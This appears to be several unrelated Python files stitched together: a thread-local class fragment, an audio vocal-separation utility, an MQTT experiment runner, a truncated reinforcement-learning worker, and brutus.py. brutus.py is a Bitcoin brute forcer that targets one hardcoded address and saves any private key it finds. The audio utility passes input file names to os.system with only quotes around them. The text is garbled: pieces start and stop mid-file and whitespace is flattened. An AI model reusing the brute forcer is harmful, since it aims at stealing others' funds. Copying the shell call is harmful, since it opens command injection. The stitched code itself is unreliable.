impl.get_dict() except KeyError: dct = impl.create_dict() args, kw = impl.localargs self.__init__(*args, **kw) with impl.locallock: object.__setattr__(self, '__dict__', dct) yield class local: __slots__ = '_local__impl', '__dict__' def __new__(cls, *args, **kw): if (args or kw) and (cls.__init__ is object.__init__): raise TypeError("Initialization arguments are not supported") self = object.__new__(cls) impl = _localimpl() impl.localargs = (args, kw) impl.locallock = RLock() object.__setattr__(self, '_local__impl', impl) # We need to create the thread dict in anticipation of # __init__ being called, to make sure we don't call it # again ourselves. impl.create_dict() return self def __getattribute__(self, name): with _patch(self): return object.__getattribute__(self, name) def __setattr__(self, name, value): if name == '__dict__': raise AttributeError( "%r object attribute '__dict__' is read-only" % self.__class__.__name__) with _patch(self): return object.__setattr__(self, name, value) def __delattr__(self, name): if name == '__dict__': raise AttributeError( "%r object attribute '__dict__' is read-only" % self.__class__.__name__) with _patch(self): return object.__delattr__(self, name) from threading import current_thread, RLock
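# A small practical example of the class above, beyond the doctests in the
# module docstring: caching one expensive resource per thread.  The helper name
# and the idea of a per-thread "resource" are illustrative assumptions, not part
# of this module.
_tls = local()

def get_per_thread_resource(factory):
    """Return this thread's cached resource, creating it on first use."""
    resource = getattr(_tls, 'resource', None)
    if resource is None:
        resource = _tls.resource = factory()
    return resource

# usage (illustrative): each thread gets its own connection object
#   conn = get_per_thread_resource(lambda: open_database_connection())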
spec_utils.py
import os import librosa import numpy as np import soundfile as sf import math import json import hashlib import threading from tqdm import tqdm def crop_center(h1, h2): h1_shape = h1.size() h2_shape = h2.size() if h1_shape[3] == h2_shape[3]: return h1 elif h1_shape[3] < h2_shape[3]: raise ValueError('h1_shape[3] must be greater than h2_shape[3]') # s_freq = (h2_shape[2] - h1_shape[2]) // 2 # e_freq = s_freq + h1_shape[2] s_time = (h1_shape[3] - h2_shape[3]) // 2 e_time = s_time + h2_shape[3] h1 = h1[:, :, :, s_time:e_time] return h1 def wave_to_spectrogram(wave, hop_length, n_fft, mp, multithreading): if mp.param['reverse']: wave_left = np.flip(np.asfortranarray(wave[0])) wave_right = np.flip(np.asfortranarray(wave[1])) elif mp.param['mid_side_b']: wave_left = np.asfortranarray(np.add(wave[0], wave[1] * .5)) wave_right = np.asfortranarray(np.subtract(wave[1], wave[0] * .5)) elif mp.param['mid_side']: wave_left = np.asfortranarray(np.add(wave[0], wave[1]) / 2) wave_right = np.asfortranarray(np.subtract(wave[0], wave[1])) else: wave_left = np.asfortranarray(wave[0]) wave_right = np.asfortranarray(wave[1]) if multithreading: def run_thread(**kwargs): global spec_left_mt spec_left_mt = librosa.stft(**kwargs) thread = threading.Thread(target=run_thread, kwargs={'y': wave_left, 'n_fft': n_fft, 'hop_length': hop_length}) thread.start() spec_right = librosa.stft(wave_right, n_fft, hop_length=hop_length) thread.join() spec = np.asfortranarray([spec_left_mt, spec_right]) else: spec_left = librosa.stft(wave_left, n_fft, hop_length=hop_length) spec_right = librosa.stft(wave_right, n_fft, hop_length=hop_length) spec = np.asfortranarray([spec_left, spec_right]) return spec def combine_spectrograms(specs, mp): l = min([specs[i].shape[2] for i in specs]) spec_c = np.zeros(shape=(2, mp.param['bins'] + 1, l), dtype=np.complex64) offset = 0 bands_n = len(mp.param['band']) for d in range(1, bands_n + 1): h = mp.param['band'][d]['crop_stop'] - mp.param['band'][d]['crop_start'] spec_c[:, offset:offset+h, :l] = specs[d][:, mp.param['band'][d]['crop_start']:mp.param['band'][d]['crop_stop'], :l] offset += h if offset > mp.param['bins']: raise ValueError('Too much bins') # lowpass fiter if mp.param['pre_filter_start'] > 0: # and mp.param['band'][bands_n]['res_type'] in ['scipy', 'polyphase']: if bands_n == 1: spec_c = fft_lp_filter(spec_c, mp.param['pre_filter_start'], mp.param['pre_filter_stop']) else: gp = 1 for b in range(mp.param['pre_filter_start'] + 1, mp.param['pre_filter_stop']): g = math.pow(10, -(b - mp.param['pre_filter_start']) * (3.5 - gp) / 20.0) gp = g spec_c[:, b, :] *= g return np.asfortranarray(spec_c) def spectrogram_to_image(spec, mode='magnitude'): if mode == 'magnitude': if np.iscomplexobj(spec): y = np.abs(spec) else: y = spec y = np.log10(y ** 2 + 1e-8) elif mode == 'phase': if np.iscomplexobj(spec): y = np.angle(spec) else: y = spec y -= y.min() y *= 255 / y.max() img = np.uint8(y) if y.ndim == 3: img = img.transpose(1, 2, 0) img = np.concatenate([ np.max(img, axis=2, keepdims=True), img ], axis=2) return img def reduce_vocal_aggressively(X, y, softmask): v = X - y y_mag_tmp = np.abs(y) v_mag_tmp = np.abs(v) v_mask = v_mag_tmp > y_mag_tmp y_mag = np.clip(y_mag_tmp - v_mag_tmp * v_mask * softmask, 0, np.inf) return y_mag * np.exp(1.j * np.angle(y)) def mask_silence(mag, ref, thres=0.2, min_range=64, fade_size=32): if min_range < fade_size * 2: raise ValueError('min_range must be >= fade_area * 2') mag = mag.copy() idx = np.where(ref.mean(axis=(0, 1)) < thres)[0] starts = 
np.insert(idx[np.where(np.diff(idx) != 1)[0] + 1], 0, idx[0]) ends = np.append(idx[np.where(np.diff(idx) != 1)[0]], idx[-1]) uninformative = np.where(ends - starts > min_range)[0] if len(uninformative) > 0: starts = starts[uninformative] ends = ends[uninformative] old_e = None for s, e in zip(starts, ends): if old_e is not None and s - old_e < fade_size: s = old_e - fade_size * 2 if s != 0: weight = np.linspace(0, 1, fade_size) mag[:, :, s:s + fade_size] += weight * ref[:, :, s:s + fade_size] else: s -= fade_size if e != mag.shape[2]: weight = np.linspace(1, 0, fade_size) mag[:, :, e - fade_size:e] += weight * ref[:, :, e - fade_size:e] else: e += fade_size mag[:, :, s + fade_size:e - fade_size] += ref[:, :, s + fade_size:e - fade_size] old_e = e return mag def align_wave_head_and_tail(a, b): l = min([a[0].size, b[0].size]) return a[:l,:l], b[:l,:l] def cache_or_load(mix_path, inst_path, mp): mix_basename = os.path.splitext(os.path.basename(mix_path))[0] inst_basename = os.path.splitext(os.path.basename(inst_path))[0] cache_dir = 'mph{}'.format(hashlib.sha1(json.dumps(mp.param, sort_keys=True).encode('utf-8')).hexdigest()) mix_cache_dir = os.path.join('cache', cache_dir) inst_cache_dir = os.path.join('cache', cache_dir) os.makedirs(mix_cache_dir, exist_ok=True) os.makedirs(inst_cache_dir, exist_ok=True) mix_cache_path = os.path.join(mix_cache_dir, mix_basename + '.npy') inst_cache_path = os.path.join(inst_cache_dir, inst_basename + '.npy') if os.path.exists(mix_cache_path) and os.path.exists(inst_cache_path): X_spec_m = np.load(mix_cache_path) y_spec_m = np.load(inst_cache_path) else: X_wave, y_wave, X_spec_s, y_spec_s = {}, {}, {}, {} for d in range(len(mp.param['band']), 0, -1): bp = mp.param['band'][d] if d == len(mp.param['band']): # high-end band X_wave[d], _ = librosa.load( mix_path, bp['sr'], False, dtype=np.float32, res_type=bp['res_type']) y_wave[d], _ = librosa.load( inst_path, bp['sr'], False, dtype=np.float32, res_type=bp['res_type']) else: # lower bands X_wave[d] = librosa.resample(X_wave[d+1], mp.param['band'][d+1]['sr'], bp['sr'], res_type=bp['res_type']) y_wave[d] = librosa.resample(y_wave[d+1], mp.param['band'][d+1]['sr'], bp['sr'], res_type=bp['res_type']) X_wave[d], y_wave[d] = align_wave_head_and_tail(X_wave[d], y_wave[d]) X_spec_s[d] = wave_to_spectrogram(X_wave[d], bp['hl'], bp['n_fft'], mp, False) y_spec_s[d] = wave_to_spectrogram(y_wave[d], bp['hl'], bp['n_fft'], mp, False) del X_wave, y_wave X_spec_m = combine_spectrograms(X_spec_s, mp) y_spec_m = combine_spectrograms(y_spec_s, mp) if X_spec_m.shape != y_spec_m.shape: raise ValueError('The combined spectrograms are different: ' + mix_path) _, ext = os.path.splitext(mix_path) np.save(mix_cache_path, X_spec_m) np.save(inst_cache_path, y_spec_m) return X_spec_m, y_spec_m def spectrogram_to_wave(spec, hop_length, mp, multithreading): import threading spec_left = np.asfortranarray(spec[0]) spec_right = np.asfortranarray(spec[1]) if multithreading: def run_thread(**kwargs): global wave_left wave_left = librosa.istft(**kwargs) thread = threading.Thread(target=run_thread, kwargs={'stft_matrix': spec_left, 'hop_length': hop_length}) thread.start() wave_right = librosa.istft(spec_right, hop_length=hop_length) thread.join() else: wave_left = librosa.istft(spec_left, hop_length=hop_length) wave_right = librosa.istft(spec_right, hop_length=hop_length) if mp.param['reverse']: return np.asfortranarray([np.flip(wave_left), np.flip(wave_right)]) elif mp.param['mid_side_b']: return np.asfortranarray([np.subtract(wave_left / 1.25, .4 
* wave_right), np.add(wave_right / 1.25, .4 * wave_left)]) elif mp.param['mid_side']: return np.asfortranarray([np.add(wave_left, wave_right / 2), np.subtract(wave_left, wave_right / 2)]) else: return np.asfortranarray([wave_left, wave_right]) def cmb_spectrogram_to_wave(spec_m, mp, extra_bins_h=None, extra_bins=None): wave_band = {} bands_n = len(mp.param['band']) offset = 0 for d in range(1, bands_n + 1): bp = mp.param['band'][d] spec_s = np.ndarray(shape=(2, bp['n_fft'] // 2 + 1, spec_m.shape[2]), dtype=complex) h = bp['crop_stop'] - bp['crop_start'] spec_s[:, bp['crop_start']:bp['crop_stop'], :] = spec_m[:, offset:offset+h, :] offset += h if d == bands_n: # higher if extra_bins_h: # if --high_end_process bypass max_bin = bp['n_fft'] // 2 spec_s[:, max_bin-extra_bins_h:max_bin, :] = extra_bins[:, :extra_bins_h, :] if bp['hpf_start'] > 0: spec_s = fft_hp_filter(spec_s, bp['hpf_start'], bp['hpf_stop'] - 1) if bands_n == 1: wave = spectrogram_to_wave(spec_s, bp['hl'], mp, False) else: wave = np.add(wave, spectrogram_to_wave(spec_s, bp['hl'], mp, False)) else: sr = mp.param['band'][d+1]['sr'] if d == 1: # lower spec_s = fft_lp_filter(spec_s, bp['lpf_start'], bp['lpf_stop']) wave = librosa.resample(spectrogram_to_wave(spec_s, bp['hl'], mp, False), bp['sr'], sr, res_type="sinc_fastest") else: # mid spec_s = fft_hp_filter(spec_s, bp['hpf_start'], bp['hpf_stop'] - 1) spec_s = fft_lp_filter(spec_s, bp['lpf_start'], bp['lpf_stop']) wave2 = np.add(wave, spectrogram_to_wave(spec_s, bp['hl'], mp, False)) wave = librosa.resample(wave2, bp['sr'], sr, res_type="sinc_fastest") return wave.T def cmb_spectrogram_to_wave_ffmpeg(spec_m, mp, tmp_basename, extra_bins_h=None, extra_bins=None): import subprocess bands_n = len(mp.param['band']) offset = 0 ffmprc = {} for d in range(1, bands_n + 1): bp = mp.param['band'][d] spec_s = np.ndarray(shape=(2, bp['n_fft'] // 2 + 1, spec_m.shape[2]), dtype=complex) h = bp['crop_stop'] - bp['crop_start'] spec_s[:, bp['crop_start']:bp['crop_stop'], :] = spec_m[:, offset:offset+h, :] tmp_wav = '{}_cmb_spectrogram_to_wave_b{}_sr{}'.format(tmp_basename, d, str(bp['sr']) + '.wav') tmp_wav2 = '{}_cmb_spectrogram_to_wave_b{}_sr{}'.format(tmp_basename, d, str(mp.param['sr']) + '.wav') offset += h if d == bands_n: # high-end if extra_bins_h: # if --high_end_process bypass max_bin = bp['n_fft'] // 2 spec_s[:, max_bin-extra_bins_h:max_bin, :] = extra_bins[:, :extra_bins_h, :] if bp['hpf_start'] > 0: spec_s = fft_hp_filter(spec_s, bp['hpf_start'], bp['hpf_stop'] - 1) if bands_n == 1: wave = spectrogram_to_wave(spec_s, bp['hl'], mp, False) else: wave = spectrogram_to_wave(spec_s, bp['hl'], mp, False) else: if d == 1: # lower spec_s = fft_lp_filter(spec_s, bp['lpf_start'], bp['lpf_stop']) else: # mid spec_s = fft_hp_filter(spec_s, bp['hpf_start'], bp['hpf_stop'] - 1) spec_s = fft_lp_filter(spec_s, bp['lpf_start'], bp['lpf_stop']) sf.write(tmp_wav, spectrogram_to_wave(spec_s, bp['hl'], mp, False).T, bp['sr']) ffmprc[d] = subprocess.Popen(['ffmpeg', '-hide_banner', '-loglevel', 'panic', '-y', '-i', tmp_wav, '-ar', str(mp.param['sr']), '-ac', '2', '-c:a', 'pcm_s16le', tmp_wav2]) for s in ffmprc: ffmprc[s].communicate() for d in range(bands_n - 1, 0, -1): os.remove(f'{tmp_basename}_cmb_spectrogram_to_wave_b{d}_sr' + str(mp.param['band'][d]['sr']) + '.wav') tmp_wav2 = f'{tmp_basename}_cmb_spectrogram_to_wave_b{d}_sr' + str(mp.param['sr']) + '.wav' wave2, _ = librosa.load(tmp_wav2, mp.param['sr'], False, dtype=np.float32, res_type="sinc_fastest") os.remove(tmp_wav2) wave = np.add(wave, 
wave2) return wave.T def fft_lp_filter(spec, bin_start, bin_stop): g = 1.0 for b in range(bin_start, bin_stop): g -= 1 / (bin_stop - bin_start) spec[:, b, :] = g * spec[:, b, :] spec[:, bin_stop:, :] *= 0 return spec def fft_hp_filter(spec, bin_start, bin_stop): g = 1.0 for b in range(bin_start, bin_stop, -1): g -= 1 / (bin_start - bin_stop) spec[:, b, :] = g * spec[:, b, :] spec[:, 0:bin_stop+1, :] *= 0 return spec def mirroring(a, spec_m, input_high_end, mp): if 'mirroring' == a: mirror = np.flip(np.abs(spec_m[:, mp.param['pre_filter_start']-10-input_high_end.shape[1]:mp.param['pre_filter_start']-10, :]), 1) mirror = mirror * np.exp(1.j * np.angle(input_high_end)) return np.where(np.abs(input_high_end) <= np.abs(mirror), input_high_end, mirror) if 'mirroring2' == a: mirror = np.flip(np.abs(spec_m[:, mp.param['pre_filter_start']-10-input_high_end.shape[1]:mp.param['pre_filter_start']-10, :]), 1) mi = np.multiply(mirror, input_high_end * 1.7) return np.where(np.abs(input_high_end) <= np.abs(mi), input_high_end, mi) def ensembling(a, specs): for i in range(1, len(specs)): if i == 1: spec = specs[0] ln = min([spec.shape[2], specs[i].shape[2]]) spec = spec[:,:,:ln] specs[i] = specs[i][:,:,:ln] if 'min_mag' == a: spec = np.where(np.abs(specs[i]) <= np.abs(spec), specs[i], spec) if 'max_mag' == a: spec = np.where(np.abs(specs[i]) >= np.abs(spec), specs[i], spec) return spec if __name__ == "__main__": import cv2 import sys import time import argparse from model_param_init import ModelParameters p = argparse.ArgumentParser() p.add_argument('--algorithm', '-a', type=str, choices=['invert', 'invert_p', 'min_mag', 'max_mag', 'deep', 'align'], default='min_mag') p.add_argument('--model_params', '-m', type=str, default=os.path.join('modelparams', '1band_sr44100_hl512.json')) p.add_argument('--output_name', '-o', type=str, default='output') p.add_argument('--vocals_only', '-v', action='store_true') p.add_argument('input', nargs='+') args = p.parse_args() start_time = time.time() if args.algorithm.startswith('invert') and len(args.input) != 2: raise ValueError('There should be two input files.') if not args.algorithm.startswith('invert') and len(args.input) < 2: raise ValueError('There must be at least two input files.') wave, specs = {}, {} mp = ModelParameters(args.model_params) for i in range(len(args.input)): spec = {} for d in range(len(mp.param['band']), 0, -1): bp = mp.param['band'][d] if d == len(mp.param['band']): # high-end band wave[d], _ = librosa.load( args.input[i], bp['sr'], False, dtype=np.float32, res_type=bp['res_type']) if len(wave[d].shape) == 1: # mono to stereo wave[d] = np.array([wave[d], wave[d]]) else: # lower bands wave[d] = librosa.resample(wave[d+1], mp.param['band'][d+1]['sr'], bp['sr'], res_type=bp['res_type']) spec[d] = wave_to_spectrogram(wave[d], bp['hl'], bp['n_fft'], mp, False) specs[i] = combine_spectrograms(spec, mp) del wave if args.algorithm == 'deep': d_spec = np.where(np.abs(specs[0]) <= np.abs(spec[1]), specs[0], spec[1]) v_spec = d_spec - specs[1] sf.write(os.path.join('{}.wav'.format(args.output_name)), cmb_spectrogram_to_wave(v_spec, mp), mp.param['sr']) if args.algorithm.startswith('invert'): ln = min([specs[0].shape[2], specs[1].shape[2]]) specs[0] = specs[0][:,:,:ln] specs[1] = specs[1][:,:,:ln] if 'invert_p' == args.algorithm: X_mag = np.abs(specs[0]) y_mag = np.abs(specs[1]) max_mag = np.where(X_mag >= y_mag, X_mag, y_mag) v_spec = specs[1] - max_mag * np.exp(1.j * np.angle(specs[0])) else: specs[1] = reduce_vocal_aggressively(specs[0], specs[1], 0.2) 
v_spec = specs[0] - specs[1] if not args.vocals_only: X_mag = np.abs(specs[0]) y_mag = np.abs(specs[1]) v_mag = np.abs(v_spec) X_image = spectrogram_to_image(X_mag) y_image = spectrogram_to_image(y_mag) v_image = spectrogram_to_image(v_mag) cv2.imwrite('{}_X.png'.format(args.output_name), X_image) cv2.imwrite('{}_y.png'.format(args.output_name), y_image) cv2.imwrite('{}_v.png'.format(args.output_name), v_image) sf.write('{}_X.wav'.format(args.output_name), cmb_spectrogram_to_wave(specs[0], mp), mp.param['sr']) sf.write('{}_y.wav'.format(args.output_name), cmb_spectrogram_to_wave(specs[1], mp), mp.param['sr']) sf.write('{}_v.wav'.format(args.output_name), cmb_spectrogram_to_wave(v_spec, mp), mp.param['sr']) else: if not args.algorithm == 'deep': sf.write(os.path.join('ensembled','{}.wav'.format(args.output_name)), cmb_spectrogram_to_wave(ensembling(args.algorithm, specs), mp), mp.param['sr']) #print('Total time: {0:.{1}f}s'.format(time.time() - start_time, 1)) if args.algorithm == 'align': trackalignment = [ { 'file1':'"{}"'.format(args.input[0]), 'file2':'"{}"'.format(args.input[1]) } ] for i,e in tqdm(enumerate(trackalignment), desc="Performing Alignment..."): os.system(f"python lib/align_tracks.py {e['file1']} {e['file2']}")
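# A self-contained sketch of what fft_lp_filter does to a toy spectrogram: the
# gain fades linearly toward 0 across [bin_start, bin_stop) and every bin from
# bin_stop upward is zeroed.  The shape (channels, bins, frames) mirrors the
# spectrograms used above; the numbers are illustrative only.
def _lp_filter_demo():
    toy = np.ones((2, 16, 4), dtype=np.complex64)   # flat unit-magnitude spectrum
    filtered = fft_lp_filter(toy.copy(), bin_start=8, bin_stop=12)
    # bins 0-7 keep magnitude 1.0, bins 8-11 fade out, bins 12+ are exactly 0
    print(np.abs(filtered[0, :, 0]).round(2))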
brutus.py
# Plutus Bitcoin Brute Forcer
# Made by Isaac Delly - changed for single-address brute forcing by Christian Hummel
# https://github.com/Isaacdelly/Plutus - https://github.com/diehummel/Brutus-with-fastecdsa
# Added fastecdsa - June 2019 - Ian McMurray

import os
import pickle
import hashlib
import binascii
import multiprocessing
from fastecdsa import keys, curve

BTC = '19eA3hUfKRt7aZymavdQFXg5EZ6KCVKxr8'

# Write the single target address into a pickled set that acts as the "database"
if not os.path.exists('db'):
    os.mkdir('db')
coinadress = {BTC}

filename = 'db/00.pickle'
outfile = open(filename, 'wb')
pickle.dump(coinadress, outfile)
outfile.close()

DATABASE = r'db/'


def generate_private_key():
    """Generate a random 32-byte hex integer which serves as a randomly
    generated Bitcoin private key.
    Average Time: 0.0000061659 seconds
    """
    return binascii.hexlify(os.urandom(32)).decode('utf-8').upper()


def private_key_to_public_key(private_key):
    """Accept a hex private key and convert it to its respective public key.
    Because converting a private key to a public key requires SECP256k1 ECDSA
    signing, this function is the most time consuming and is a bottleneck in
    the overall speed of the program.
    Average Time: 0.0016401287 seconds
    """
    # get the public key corresponding to the private key we just generated;
    # X and Y are zero-padded to 32 bytes each so the uncompressed key is always 65 bytes
    c = int('0x%s' % private_key, 0)
    d = keys.get_public_key(c, curve.secp256k1)
    return '04%s%s' % ('{0:064x}'.format(int(d.x)), '{0:064x}'.format(int(d.y)))


def public_key_to_address(public_key):
    """Accept a public key and convert it to its respective P2PKH wallet address.
    Average Time: 0.0000801390 seconds
    """
    #print('Wanting to [%s] this to address'%public_key)
    output = []
    alphabet = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
    var = hashlib.new('ripemd160')
    try:
        var.update(hashlib.sha256(binascii.unhexlify(public_key.encode())).digest())
        var = '00' + var.hexdigest() + hashlib.sha256(hashlib.sha256(binascii.unhexlify(('00' + var.hexdigest()).encode())).digest()).hexdigest()[0:8]
        count = [char != '0' for char in var].index(True) // 2
        n = int(var, 16)
        while n > 0:
            n, remainder = divmod(n, 58)
            output.append(alphabet[remainder])
        for i in range(count):
            output.append(alphabet[0])
        return ''.join(output[::-1])
    except Exception:
        # malformed public key; signal failure to the caller
        return -1


def process(private_key, public_key, address, database):
    """Accept an address and query the database. If the address is found in
    the database, then it is assumed to have a balance and the wallet data is
    written to the hard drive. If the address is not in the database, then it
    is assumed to be empty and printed to the user. This is a fast and
    efficient query.
    Average Time: 0.0000026941 seconds
    """
    if address in database:
        with open('plutus.txt', 'a') as file:
            file.write('hex private key: ' + str(private_key) + '\n' +
                       'public key: ' + str(public_key) + '\n' +
                       'address: ' + str(address) + '\n\n')
            #'WIF private key: ' + str(private_key_to_WIF(private_key)) + '\n' +
    else:
        print(str(address) + '\n' +
              'public key: ' + str(public_key) + '\n' +
              'address: ' + str(address) + '\n' +
              ' -> find ->' + str(database) + '\n\n')


def private_key_to_WIF(private_key):
    """Convert the hex private key into Wallet Import Format for easier wallet
    importing. This function is only called if a wallet with a balance is
    found. Because that event is rare, this function is not significant to the
    main pipeline of the program and is not timed.
    """
    var = hashlib.sha256(binascii.unhexlify(hashlib.sha256(binascii.unhexlify('80' + private_key)).hexdigest())).hexdigest()
    var = binascii.unhexlify('80' + private_key + var[0:8])
    alphabet = chars = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
    value = pad = 0
    result = ''
    for i, c in enumerate(var[::-1]):
        value += 256**i * c
    while value >= len(alphabet):
        div, mod = divmod(value, len(alphabet))
        result, value = chars[mod] + result, div
    result = chars[value] + result
    for c in var:
        if c == 0:
            pad += 1
        else:
            break
    return chars[0] * pad + result


def main(database):
    """Create the main pipeline by using an infinite loop to repeatedly call
    the functions, while utilizing multiprocessing from __main__. Because all
    the functions are relatively fast, it is better to combine them all into
    one process.
    """
    while True:
        private_key = generate_private_key()                 # 0.0000061659 seconds
        public_key = private_key_to_public_key(private_key)  # 0.0016401287 seconds
        address = public_key_to_address(public_key)          # 0.0000801390 seconds
        if address != -1:
            process(private_key, public_key, address, database)  # 0.0000026941 seconds
        # --------------------
        # 0.0017291287 seconds


if __name__ == '__main__':
    """Read the pickle file."""
    infile = open(filename, 'rb')
    database = pickle.load(infile)
    infile.close()

    # To verify the database size, remove the # from the line below
    #print('database size: ' + str(sum(len(i) for i in database))); quit()

    for cpu in range(multiprocessing.cpu_count()):
        multiprocessing.Process(target=main, args=(database, )).start()
experiment_mqtt.py
__package__ = "modelconductor" import threading import sys import logging import yaml import os import asyncio import concurrent.futures import json import time from datetime import datetime as dt from hbmqtt.broker import Broker from hbmqtt.client import MQTTClient, ConnectException from hbmqtt.errors import MQTTException from hbmqtt.mqtt.constants import QOS_0, QOS_1, QOS_2 from modelconductor.modelhandler import SklearnModelHandler, HistoricalModelHandler from .utils import Measurement from modelconductor.experiment import Experiment, ModelStatus from modelconductor.config import config_dir logger = logging.getLogger(__name__) formatter = "[%(asctime)s] :: %(levelname)s - %(message)s" logging.basicConfig(level=logging.INFO, format=formatter) class MqttExperiment(Experiment): def init_broker(self, loop): if sys.version_info[:2] < (3, 4): logger.fatal("Error: Python 3.4+ is required") sys.exit(-1) config_file = os.path.join(config_dir, 'default_broker.yaml') try: with open(config_file, 'r') as stream: config = yaml.full_load(stream) if hasattr(yaml, 'full_load') else yaml.load(stream) except yaml.YAMLError as exc: logger.error("Invalid config_file %s: %s" % (config_file, exc)) broker = Broker(config, loop=loop) return broker def init_subscriber(self, loop): config_file = os.path.join(config_dir, 'default_client.yaml') try: with open(config_file, 'r') as stream: config = yaml.full_load(stream) if hasattr(yaml, 'full_load') else yaml.load(stream) except yaml.YAMLError as exc: logger.error("Invalid config_file %s: %s" % (config_file, exc)) client = MQTTClient(client_id="mqtt_subscriber_exp", config=config, loop=loop) return client @Experiment._run def execute_model_loop(self): while True: print("waiting for buffer_equal_window") while not (self.model.status == ModelStatus.READY): time.sleep(0.1) print("continue from buffer_equal_window") result = self.model.step() print("result: ") print(result) if result is not None: result['TIMING_model_response_timestamp'] = time.time() self.log_row(result, self.model) @asyncio.coroutine def do_sub_historical(self, client, url): try: qos = QOS_1 yield from client.connect(uri=url) filters = [("topic_1", qos)] yield from client.subscribe(filters) self.model.spawn() self.model.buffer_equal_window = asyncio.Event() count = 0 with open(self.log_path + "_inputs", mode='w') as input_logger: while True: try: message = yield from client.deliver_message() count += 1 item = message.publish_packet.data data = json.loads(item.decode('utf-8')) data = Measurement(data) print(data) print(",".join(map(str, list(data.values()))), file=input_logger) input_logger.flush() data['TIMING_model_response_timestamp'] = 0 self.model.store(data) # res = self.model.step(data) # results.append(result) except MQTTException: logger.debug("Error reading packet") yield from client.disconnect() except KeyboardInterrupt: yield from client.disconnect() except ConnectException as ce: logger.fatal("connection to '%s' failed: %r" % (url, ce)) except asyncio.CancelledError as cae: logger.fatal("Publish canceled due to prvious error: %r" % cae) @asyncio.coroutine def do_sub(self, client, url): try: yield from client.connect(uri=url) qos = QOS_1 filters = [("topic_1", qos)] yield from client.subscribe(filters) self.model.spawn() count = 0 while True: try: message = yield from client.deliver_message() count += 1 item = message.publish_packet.data data = json.loads(item.decode('utf-8')) data = Measurement(data) print(data) data['TIMING_model_response_timestamp'] = 0 res = self.model.step(data) 
res['TIMING_model_response_timestamp'] = time.time() print("result: ") print(res) self.results.append(res) self.log_row(res, self.model) except MQTTException: logger.debug("Error reading packet") yield from client.disconnect() except KeyboardInterrupt: yield from client.disconnect() except ConnectException as ce: logger.fatal("connection to '%s' failed: %r" % (url, ce)) except asyncio.CancelledError as cae: logger.fatal("Publish canceled due to prvious error: %r" % cae) def init_model(self, idx_path, model_path): import pickle # load input variable names for the pretrained sklearn model with open(idx_path, 'rb') as f: idx = pickle.load(f) input_keys = idx target_keys = ["Left_NOx_pred"] control_keys = ["Left_NOx", "TIMING_client_request_timestamp", "TIMING_model_response_timestamp"] model = SklearnModelHandler(model_filename=model_path, input_keys=input_keys, target_keys=target_keys, control_keys=control_keys) return model def run(self, loop = None): if loop is None: loop = asyncio.get_event_loop() # broker = self.init_broker(loop=loop) client = self.init_subscriber(loop) try: # loop.run_until_complete(broker.start()) print("running execute_model_loop!") # loop = asyncio.get_running_loop() # with concurrent.futures.ThreadPoolExecutor() as pool: # loop.run_in_executor(pool, self.execute_model_loop) print(type(self.model)) # import pdb; pdb.set_trace() if isinstance(self.model, HistoricalModelHandler): model_runner = threading.Thread(target=self.execute_model_loop, daemon=True) model_runner.start() loop.run_until_complete(self.do_sub_historical(client, "mqtt://localhost")) else: loop.run_until_complete(self.do_sub(client, "mqtt://localhost")) loop.run_forever() except KeyboardInterrupt: pass # loop.run_until_complete(broker.shutdown()) if __name__ == "__main__": ex = MqttExperiment(logging=True) ex.model = ex.init_model(os.path.join("customexamples", "sklearnovertcp_nox_demo", "nox_idx.pickle"), \ os.path.join("customexamples", "sklearnovertcp_nox_demo", "nox_rfregressor.pickle")) headers = ["timestamp"] if ex.model.input_keys: headers += ex.model.input_keys if ex.model.target_keys: headers += ex.model.target_keys if ex.model.control_keys: headers += ex.model.control_keys ex.logger = ex.initiate_logging(headers=headers) ex.run()
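# --- Illustrative addition (not part of the original experiment_mqtt.py) ---
# Minimal, hedged sketch of a publisher that feeds the subscriber above: it sends
# one JSON payload to "topic_1" on mqtt://localhost, which is what do_sub expects.
# The field names in the payload are placeholders, not the real NOx-model inputs.
# Nothing calls this coroutine; uncomment the last line to run it standalone.
import asyncio
import json
from hbmqtt.client import MQTTClient
from hbmqtt.mqtt.constants import QOS_1

@asyncio.coroutine
def _example_publish_one_measurement():
    client = MQTTClient(client_id="mqtt_publisher_example")
    yield from client.connect(uri="mqtt://localhost")
    payload = {"some_input_signal": 1.23, "TIMING_client_request_timestamp": time.time()}
    yield from client.publish("topic_1", json.dumps(payload).encode("utf-8"), qos=QOS_1)
    yield from client.disconnect()

# asyncio.get_event_loop().run_until_complete(_example_publish_one_measurement())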
subproc.py
import gym import time import ctypes import numpy as np from collections import OrderedDict from multiprocessing.context import Process from multiprocessing import Array, Pipe, connection from typing import Callable, Any, List, Tuple, Optional from tianshou.env.worker import EnvWorker from tianshou.env.utils import CloudpickleWrapper def _worker(parent, p, env_fn_wrapper, obs_bufs=None): def _encode_obs(obs, buffer): if isinstance(obs, np.ndarray): buffer.save(obs) elif isinstance(obs, tuple): for o, b in zip(obs, buffer): _encode_obs(o, b) elif isinstance(obs, dict): for k in obs.keys(): _encode_obs(obs[k], buffer[k]) return None parent.close() env = env_fn_wrapper.data() try: while True: try: cmd, data = p.recv() except EOFError: # the pipe has been closed p.close() break if cmd == 'step': obs, reward, done, info = env.step(data) if obs_bufs is not None: obs = _encode_obs(obs, obs_bufs) p.send((obs, reward, done, info)) elif cmd == 'reset': obs = env.reset() if obs_bufs is not None: obs = _encode_obs(obs, obs_bufs) p.send(obs) elif cmd == 'close': p.send(env.close()) p.close() break elif cmd == 'render': p.send(env.render(**data) if hasattr(env, 'render') else None) elif cmd == 'seed': p.send(env.seed(data) if hasattr(env, 'seed') else None) elif cmd == 'getattr': p.send(getattr(env, data) if hasattr(env, data) else None) else: p.close() raise NotImplementedError except KeyboardInterrupt: p.close() _NP_TO_CT = { np.bool: ctypes.c_bool, np.bool_: ctypes.c_bool, np.uint8: ctypes.c_uint8, np.uint16: ctypes.c_uint16, np.uint32: ctypes.c_uint32, np.uint64: ctypes.c_uint64, np.int8: ctypes.c_int8, np.int16: ctypes.c_int16, np.int32: ctypes.c_int32, np.int64: ctypes.c_int64, np.float32: ctypes.c_float, np.float64: ctypes.c_double, } class ShArray: """Wrapper of multiprocessing Array""" def __init__(self, dtype, shape): self.arr = Array(_NP_TO_CT[dtype.type], int(np.prod(shape))) self.dtype = dtype self.shape = shape def save(self, ndarray): assert isinstance(ndarray, np.ndarray) dst = self.arr.get_obj() dst_np = np.frombuffer(dst, dtype=self.dtype).reshape(self.shape) np.copyto(dst_np, ndarray) def get(self): return np.frombuffer(self.arr.get_obj(), 